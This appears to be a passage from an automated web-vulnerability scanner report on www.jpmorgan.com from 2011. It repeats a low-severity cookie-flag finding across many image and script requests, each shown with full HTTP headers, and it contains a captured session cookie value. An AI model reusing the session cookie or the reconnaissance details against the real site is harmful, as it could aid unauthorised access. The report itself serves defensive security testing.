The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/loading.gif HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:18 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d52-703-698e73c0" Accept-Ranges: bytes Content-Length: 1795 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/prev.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:17 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d55-23c-698e73c0" Accept-Ranges: bytes Content-Length: 572 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/topclose.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:17 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d56-2ac-698e73c0" Accept-Ranges: bytes Content-Length: 684 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/logo_jpm_2008.gif HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:11 GMT Server: Apache Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT ETag: "72ab3-869-9a51d180" Accept-Ranges: bytes Content-Length: 2153 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/logo_jpm_2008_bw.gif HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:11 GMT Server: Apache Last-Modified: Tue, 29 Jul 2008 12:47:20 GMT ETag: "72ab4-884-a650600" Accept-Ranges: bytes Content-Length: 2180 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/more_services_arrow.gif HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:16 GMT Server: Apache Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT ETag: "72abd-63-90c3a200" Accept-Ranges: bytes Content-Length: 99 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/navbar_leftcorner.gif HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:11 GMT Server: Apache Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT ETag: "72ab2-63-9a51d180" Accept-Ranges: bytes Content-Length: 99 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/navbar_map.gif HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:17 GMT Server: Apache Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT ETag: "72abc-f3-90c3a200" Accept-Ranges: bytes Content-Length: 243 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/navbar_rightcorner2.gif HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:11 GMT Server: Apache Last-Modified: Fri, 28 Aug 2009 21:36:39 GMT ETag: "2e411-5a-7ab207c0" Accept-Ranges: bytes Content-Length: 90 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/news_buttons.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:23 GMT Server: Apache Last-Modified: Wed, 05 Nov 2008 00:08:28 GMT ETag: "2e609-945-fac3f700" Accept-Ranges: bytes Content-Length: 2373 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/news_gradient_cell.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:17 GMT Server: Apache Last-Modified: Thu, 04 Dec 2008 23:30:19 GMT ETag: "2e60a-13c-f191d8c0" Accept-Ranges: bytes Content-Length: 316 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_am_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 13:58:15 GMT ETag: "18844-af5-fc1b6bc0" Accept-Ranges: bytes Content-Length: 2805 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_cb_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 13:58:57 GMT ETag: "18845-822-fe9c4a40" Accept-Ranges: bytes Content-Length: 2082 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_ib_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 13:59:06 GMT ETag: "18846-927-ff259e80" Accept-Ranges: bytes Content-Length: 2343 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_pb_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 13:59:40 GMT ETag: "18847-82d-12c6b00" Accept-Ranges: bytes Content-Length: 2093 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_ts_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 13:59:50 GMT ETag: "18848-76d-1c50180" Accept-Ranges: bytes Content-Length: 1901 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_wss_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 14:00:30 GMT ETag: "18849-95b-4275b80" Accept-Ranges: bytes Content-Length: 2395 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/jpmVideoPlayerHelper.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Tue, 19 Oct 2010 20:53:29 GMT ETag: "2cd51-436-7c252440" Accept-Ranges: bytes Content-Length: 1078 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
var lightBoxTime = 0;
function embedCallback(status) { }
function addFlashBoundaryCallback() { theFlash = document.getElementById('jpmvplayer'); theFlash.onmouseout=function(e) {
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/jquery-1.3.2.min.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:42 GMT Server: Apache Last-Modified: Wed, 10 Mar 2010 23:36:59 GMT ETag: "2cd46-dfa9-c6413cc0" Accept-Ranges: bytes Content-Length: 57257 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 2009-02- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/jquery.bgiframe.min.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Sat, 21 Jul 2007 22:45:56 GMT ETag: "2c714-57a-ce817100" Accept-Ranges: bytes Content-Length: 1402 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net) * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-li ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
